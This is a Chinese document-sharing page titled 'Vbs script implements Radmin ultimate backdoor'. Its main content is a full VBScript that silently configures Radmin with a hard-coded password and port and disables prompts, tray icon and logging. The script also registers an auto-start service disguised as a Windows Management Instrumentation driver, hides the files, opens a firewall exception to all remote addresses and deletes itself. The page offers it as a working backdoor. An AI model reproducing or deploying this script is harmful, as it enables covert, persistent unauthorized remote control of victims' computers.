Vbs脚本实现radmin终极后门

Vbs脚本实现radmin终极后门Vbs脚本实现radmin终极后门 indoc.in Vbs脚本实现radmin终极后门文章内容版权归原作者所有 VICHU.NET indoc.in Vbs脚本实现radmin终极后门 on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=...

Vbs脚本实现radmin终极后门 indoc.in Vbs脚本实现radmin终极后门文章内容版权归原作者所有 VICHU.NET indoc.in Vbs脚本实现radmin终极后门 on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\RAdmin" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) uBinary = Array(1,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) 文章内容版权归原作者所有 VICHU.NET indoc.in uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241 Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码 uBinary = Array(5,4,0,0) //端口:1029 Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) uBinary = Array(10,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" strValueName = "LogFilePath" strValue = "c:\logfile.txt" set wshshell=createobject ("wscript.shell") a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0) oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp" strValueName = "Description" strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers." oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "DisplayName" strValue = "Windows Management Instrumentation Player Drivers" oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "ImagePath" strValue = "c:\windows\system32\Exporer.exe /service" oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 文章内容版权归原作者所有 VICHU.NET indoc.in set wshshell=createobject ("wscript.shell") a=wshshell.run ("net start WinManageHelp",0) b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) on error resume next //以下代码为穿透MS防火墙代码 Set objFirewall = CreateObject("HNetCfg.FwMgr") Set objPolicy = objFirewall.LocalPolicy Set objProfile = objPolicy.GetProfileByType(1) Set objApplication = CreateObject("HNetCfg.FwAuthorizedApplication") objApplication.Name = "Radmin3.0" objApplication.IPVersion = 2 objApplication.ProcessImageFileName = "%systemroot%\system32\exporer.exe" objApplication.RemoteAddresses = "*" objApplication.Scope = 0 objApplication.Enabled = True Set colApplications = objProfile.AuthorizedApplications colApplications.Add(objApplication) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删除文章内容版权归原作者所有 VICHU.NET

                    本文档为【Vbs脚本实现radmin终极后门】，请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑，
                    图片更改请在作品中右键图片并更换，文字修改请直接点击文字进行修改，也可以新增和删除文档中的内容。 
 该文档来自用户分享，如有侵权行为请发邮件ishare@vip.sina.com联系网站客服，我们会及时删除。

                    [版权声明] 本站所有资料为用户分享产生，若发现您的权利被侵害，请联系客服邮件isharekefu@iask.cn，我们尽快处理。

                    本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权，请谨慎使用。

                    网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传，仅限个人学习分享使用，禁止用于任何广告和商用目的。
                

下载需要：免费已有0 人下载

立即下载

Vbs脚本实现radmin终极后门

你可能还喜欢